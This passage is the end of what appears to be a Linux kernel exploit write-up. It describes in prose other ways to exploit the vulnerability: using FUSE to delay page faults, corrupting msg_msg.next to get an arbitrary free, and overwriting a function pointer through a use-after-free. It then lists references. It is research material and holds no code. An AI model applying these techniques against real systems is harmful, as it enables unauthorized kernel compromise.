There are many other valid approaches to exploit this vulnerability. For example, after Kernel 5.11, a first patch made userfaultfd completely inaccessible for unprivileged users, then a second patch restricted its usage in a way that only page faults from user-mode can be handled. So in the second stage, an attacker may simply use FUSE to delay page faults, creating unprivileged user+mount namespaces, or may abuse discontiguous file mapping and scheduler behavior instead of using userfaultfd.
Another approach for the second stage may be to set msg_msg.next to the address of a previously leaked structure, for example seq_operations, subprocess_info, tty_struct and so on (check References for a list of exploitable kernel structures), and then free the message and its respective segment (now pointing to the target structure) using msgrcv() without the MSG_COPY flag.
This will result in an arbitrary free primitive. From here it is possible to cause a Use-After-Free and hijack the Kernel control flow overwriting a function pointer.
Another very interesting approach is the one used to exploit CVE-2021-22555.
As always, for any question or clarification, feel free to contact me (check About).
References
6pack
The TTY demystified
Jiffies in the Linux Kernel
Utilizing msg_msg Objects For Arbitrary Read And Arbitrary Write In The Linux Kernel
- https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html (Part 1: Fire Of Salvation)
- https://syst3mfailure.io/wall-of-perdition (Part 2: Wall Of Perdition)
modprobe_path
Exploitable kernel structures